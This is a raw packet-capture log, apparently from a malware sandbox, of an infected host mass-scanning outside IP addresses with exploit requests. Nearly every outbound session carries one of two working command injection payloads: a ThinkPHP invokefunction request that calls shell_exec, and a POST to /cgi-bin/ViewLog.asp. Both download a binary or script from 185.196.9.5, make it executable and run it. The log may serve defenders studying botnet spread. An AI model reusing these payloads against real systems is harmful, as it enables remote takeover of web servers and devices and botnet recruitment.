Session ID	Source IP	Source Port	Destination IP	Destination Port
743	192.168.2.15	57856	95.217.174.97	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.507646084 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:13.754515886 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:04:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
744	192.168.2.15	53146	95.70.231.222	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.589706898 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:13.838862896 CET	238	IN	HTTP/1.1 404 Not Found Content-Length: 0 Date: Sun, 25 Feb 2024 18:04:13 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block

Session ID	Source IP	Source Port	Destination IP	Destination Port
745	192.168.2.15	59754	95.188.69.88	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.767726898 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:14.043939114 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Sun, 25 Feb 2024 18:03:59 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
746	192.168.2.15	60672	95.12.141.142	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.997729063 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:14.226123095 CET	163	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
747	192.168.2.15	37220	95.86.89.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:13.998104095 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
748	192.168.2.15	46088	95.100.80.238	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:14.007441998 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:14.276999950 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:14 GMT Date: Sun, 25 Feb 2024 18:04:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 35 61 30 64 35 31 37 26 23 34 36 3b 31 37 30 38 38 38 34 32 35 34 26 23 34 36 3b 35 66 63 61 37 39 63 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d5a0d517.1708884254.5fca79c9</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
749	192.168.2.15	54102	62.29.2.24	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.531611919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
750	192.168.2.15	48376	94.120.9.158	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.531651020 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
751	192.168.2.15	57758	62.29.40.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.531685114 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
752	192.168.2.15	50798	62.64.199.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.722537994 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:16.905723095 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:16 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
753	192.168.2.15	37046	31.188.255.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.735332966 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:16.947387934 CET	161	IN	HTTP/1.1 404 Not Found Server: Boa/0.94.13 Date: Sun, 25 Feb 2024 18:04:31 GMT Content-Type: text/html Content-Length: 126 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
754	192.168.2.15	37234	62.29.99.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.762891054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
755	192.168.2.15	48928	95.183.126.93	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.763366938 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
756	192.168.2.15	43194	85.138.206.62	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.946913958 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
757	192.168.2.15	39968	31.200.6.249	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.984277010 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
758	192.168.2.15	41796	94.120.34.177	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.984574080 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
759	192.168.2.15	40190	31.200.84.207	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:16.984662056 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
760	192.168.2.15	60736	62.210.101.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.498291969 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:18.053700924 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:18.227356911 CET	341	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:04:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port
761	192.168.2.15	50210	88.221.194.99	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.524568081 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:17.740746975 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
Feb 25, 2024 19:04:17.788877010 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
Feb 25, 2024 19:04:17.889548063 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
762	192.168.2.15	42212	88.24.87.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.527506113 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:17.745577097 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
763	192.168.2.15	51896	94.253.63.23	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.538682938 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.777956009 CET	224	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
764	192.168.2.15	46208	94.123.244.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.543464899 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
765	192.168.2.15	60776	95.68.43.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:17.558828115 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:18.119517088 CET	64	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
766	192.168.2.15	40506	88.216.129.3	80

Timestamp	Bytes transferred	Direction	Data
